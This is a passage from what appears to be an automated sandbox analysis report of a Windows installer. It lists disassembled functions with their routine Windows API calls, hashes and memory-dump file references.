                                                                                                                                                                              • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-3996158991
                                                                                                                                                                              • Opcode ID: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction ID: 4e8fd1e35b9bd316a1986826290dd36403ea9051864cc1cb0d95b6b3b8491259
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0046b01194f45989ad11c66adb1cb23633d454a228b8b44353d6b6dc9d5ae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B315071914209DFDB20EFA8C855BFEB7F4EB15310F104A69E825B32D1DBB49A44CBA1
                                                                                                                                                                              Function 00D04120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00D020EA,?,02141699,?,?,?,?,00DF6965,000000FF), ref: 00D0412D
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D020EA,?,02141699,?,?,?,?,00DF6965,000000FF,?), ref: 00D0414E
                                                                                                                                                                              • GetLastError.KERNEL32(?,02141699,?,?,?,?,00DF6965,000000FF,?,00D019ED,?,?,00000000,?,?), ref: 00D041AE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateEvent$ErrorLast
                                                                                                                                                                              • String ID: AdvancedInstaller
                                                                                                                                                                              • API String ID: 1131763895-1372594473
                                                                                                                                                                              • Opcode ID: 3bf754a2ea46f5ac8a316733b0110afaa36b34e59712654c0d5bb2b719e4131b
                                                                                                                                                                              • Instruction ID: a38c797263e51b12ebdb0417ec6819b259310be14d8b89cebcb02d9cf1b6a4ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 3bf754a2ea46f5ac8a316733b0110afaa36b34e59712654c0d5bb2b719e4131b
                                                                                                                                                                              • Instruction Fuzzy Hash: 491137B1340702BFD3209B21CC89F16BBA4FF94704F244529F6099B6D0CB71E895CBA1
                                                                                                                                                                              Function 00CA9F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CAA450: __Init_thread_footer.LIBCMT ref: 00CAA4E0
                                                                                                                                                                                • Part of subcall function 00CAA450: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                                • Part of subcall function 00CAA450: __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                                • Part of subcall function 00CAA450: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CAA55F
                                                                                                                                                                              • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CA9F92
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00CA9FB0
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00CA9FB8
                                                                                                                                                                                • Part of subcall function 00BB83A0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BB83D6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 605634508-78025650
                                                                                                                                                                              • Opcode ID: d619e4bd1c95cfb4e7b53cc2e60291f8ac4bad71d46a0dbdc7e9e26c24453cba
                                                                                                                                                                              • Instruction ID: ba3c1cc27bd2dcad28b7935afb9d8d1a6f05cd0cc8a00c6961596b6d51bcef1e
                                                                                                                                                                              • Opcode Fuzzy Hash: d619e4bd1c95cfb4e7b53cc2e60291f8ac4bad71d46a0dbdc7e9e26c24453cba
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F113936300311AFD6249B168C05F5BFBA9FBC9B54F15461AFA04AB2A1C7B1AD00CAA1
                                                                                                                                                                              Function 00BB9DD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA699C), ref: 00BB9E0C
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BB9E20
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9E5F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 2351996187-3261393531
                                                                                                                                                                              • Opcode ID: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction ID: 8f1636963db1126f160c2bd3395035903c06df1da83634ede9dec6e5dda58cfd
                                                                                                                                                                              • Opcode Fuzzy Hash: e39c3967ef695b664d224470de08bd193ce0a7cd2e4771a9ec7190588b8cae54
                                                                                                                                                                              • Instruction Fuzzy Hash: CE11B231A05244DFCB20CF69D80476ABBE4EB9AB20F14879ED915A7390D7B1A808C790
                                                                                                                                                                              Function 00D84AFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue), ref: 00D84B09
                                                                                                                                                                              • GetLastError.KERNEL32(?,00D84AAD,?,?,00000000,?,?,?,00D84BD7,00000002,FlsGetValue,00E0DF18,FlsGetValue,?,?,00D819F4), ref: 00D84B13
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D84B3B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              • Opcode ID: 31d4a1a447a0f10d97898fcc5f33853666b8b138a9eef30f5074d1fabacbef1f
                                                                                                                                                                              • Instruction ID: 2eaf912b7e141d752f3456687ab34b623920b34985013011a8648164ec5a6f82
                                                                                                                                                                              • Opcode Fuzzy Hash: 31d4a1a447a0f10d97898fcc5f33853666b8b138a9eef30f5074d1fabacbef1f
                                                                                                                                                                              • Instruction Fuzzy Hash: C4E04831740205FBEB103B91EC06F297B58AB00B50F244021FA0CF90E0E772E995C794
                                                                                                                                                                              Function 00BC7FF0 Relevance: 6.3, APIs: 4, Instructions: 321windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00BC8138
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00BC814D
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00CAA030: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA098
                                                                                                                                                                                • Part of subcall function 00CAA030: RedrawWindow.USER32(?,00000000,00000000,00000541,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA0A9
                                                                                                                                                                                • Part of subcall function 00CAA030: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CAA0C8
                                                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00BC8283
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00BC837F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$AllocateHeapRedraw
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 884508843-0
                                                                                                                                                                              • Opcode ID: cf213121fda335890373304f2ba6978cc6343c62ac9b0f743e953e04dfbac489
                                                                                                                                                                              • Instruction ID: 66eba68f4901ccc53eb1136500274b4c41b3e2f61592a665ae92bc25073d215d
                                                                                                                                                                              • Opcode Fuzzy Hash: cf213121fda335890373304f2ba6978cc6343c62ac9b0f743e953e04dfbac489
                                                                                                                                                                              • Instruction Fuzzy Hash: FEC18D71A002099FDB18DFA8C889FEEFBF5FF48314F144259E415AB291DB74A944CBA0
                                                                                                                                                                              Function 00BB6480 Relevance: 6.3, APIs: 4, Instructions: 269memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00BB654A
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6596
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB65B8
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                                                              • Opcode ID: 99f062f09de279d64b957aa927e49cc73b6fd4b5dbcce9d18bff386760cc2720
                                                                                                                                                                              • Instruction ID: efd5f52a09ad7c071714711a8a15b7130d5171571d131b65306e507d973cfd79
                                                                                                                                                                              • Opcode Fuzzy Hash: 99f062f09de279d64b957aa927e49cc73b6fd4b5dbcce9d18bff386760cc2720
                                                                                                                                                                              • Instruction Fuzzy Hash: D9A14F71A002099FDB25DFA9C944BFEB7F8EF44714F108159E915E7280EBB8AE05CB61
                                                                                                                                                                              Function 00BD1800 Relevance: 6.2, APIs: 4, Instructions: 246windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00BD18D5
                                                                                                                                                                              • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00BD1907
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00BD1A7E
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00BD1AA6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 9ce6b9e3bc1a1d7aabacf1c83513b0eb35fb377683ffc0c2248bad53b4c08dc1
                                                                                                                                                                              • Instruction ID: 1351c762106b144969fa5c24d63e06b630497a3f3aea657ad7bdc83536fe3e01
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ce6b9e3bc1a1d7aabacf1c83513b0eb35fb377683ffc0c2248bad53b4c08dc1
                                                                                                                                                                              • Instruction Fuzzy Hash: 7F916A71A01205EFCB25DF68D891AEEF7F5FF09310F0449AAE412A7391E770A945CBA0
                                                                                                                                                                              Function 00BC0C70 Relevance: 6.2, APIs: 4, Instructions: 183windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,00000000), ref: 00BC0D09
                                                                                                                                                                              • GetParent.USER32(?), ref: 00BC0D29
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000135,?,?), ref: 00BC0D39
                                                                                                                                                                              • FillRect.USER32(?,00000000,00000000), ref: 00BC0D47
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$ClientFillMessageParentSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 425900729-0
                                                                                                                                                                              • Opcode ID: 0ac2658ee999b36fc698a6b6a8485ac2e85dd340df116e8a301567d315339924
                                                                                                                                                                              • Instruction ID: 6e0ba48bac708068c8bedfc952a9c9000a1c78215c6b182589d6274eacf17882
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ac2658ee999b36fc698a6b6a8485ac2e85dd340df116e8a301567d315339924
                                                                                                                                                                              • Instruction Fuzzy Hash: B9810A70901219EFDB25DF64C958B9ABBF4FF09304F1081AAE509E7251DB71AE94CF50
                                                                                                                                                                              Function 00BD4F10 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000C5,?,00000000), ref: 00BD4F5B
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BD4F8D
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BD4FA0
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00BD4FA7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsClientDeviceMessageRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3507044913-0
                                                                                                                                                                              • Opcode ID: de634884f0b18f2c7202e9ad8408aa65aa18f885777692496095fc5218dd7a96
                                                                                                                                                                              • Instruction ID: 113acf7a1e62d44e4deb247a668d2d7ca6311df5c8cf45dd7e9966f65441a22d
                                                                                                                                                                              • Opcode Fuzzy Hash: de634884f0b18f2c7202e9ad8408aa65aa18f885777692496095fc5218dd7a96
                                                                                                                                                                              • Instruction Fuzzy Hash: 20417F316143049FE721DF75CC06F9AB7E9AF88300F144A2AF549E72A1EB71A954CB92
                                                                                                                                                                              Function 00BC1760 Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BC17B9
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BC17ED
                                                                                                                                                                              • SendMessageW.USER32(?,00000317,00000000,00000006), ref: 00BC1819
                                                                                                                                                                              • SendMessageW.USER32(?,00000318,?,00000006), ref: 00BC1877
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$ClientErrorLastRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2591167063-0
                                                                                                                                                                              • Opcode ID: 2f9148b8ab6e0151878ea35fe8f961106a263f2492651620d17f2e3b6037d7f0
                                                                                                                                                                              • Instruction ID: 22f9e2429d22be53b62f3e01fce1f2225b733e5eecfd2c29f81216a8caff69ba
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f9148b8ab6e0151878ea35fe8f961106a263f2492651620d17f2e3b6037d7f0
                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31B370A04708AFE721CF69CD49BAABBF8EB05710F10066EF552F61E1D775A944C760
                                                                                                                                                                              Function 00C59EA0 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindResourceW.KERNEL32(00000000,?,00000017,02141699,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0), ref: 00C59EE9
                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59EF8
                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59F03
                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,00EA14E0,?,?,?,?,00000000,Function_002373AD,000000FF,?,?,00EA14E0,?), ref: 00C59F14
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                                              • Opcode ID: 6af456bf3728bad180659581dc79b7bcfa7537eacb08508cbecfd5cbcbea8e19
                                                                                                                                                                              • Instruction ID: 1b42ecf4206ef1a8e32ef620c7b13a8ad5d7478516bfb2b3e8b18a5bf662cc14
                                                                                                                                                                              • Opcode Fuzzy Hash: 6af456bf3728bad180659581dc79b7bcfa7537eacb08508cbecfd5cbcbea8e19
                                                                                                                                                                              • Instruction Fuzzy Hash: CD31D175D08605EFDB209FB5DC01BAFB7B8EB54710F104369EC25E3280EB309A48C6A1
                                                                                                                                                                              Function 00D17C00 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D17C4A
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D17C5D
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D17CB7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D17CCA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
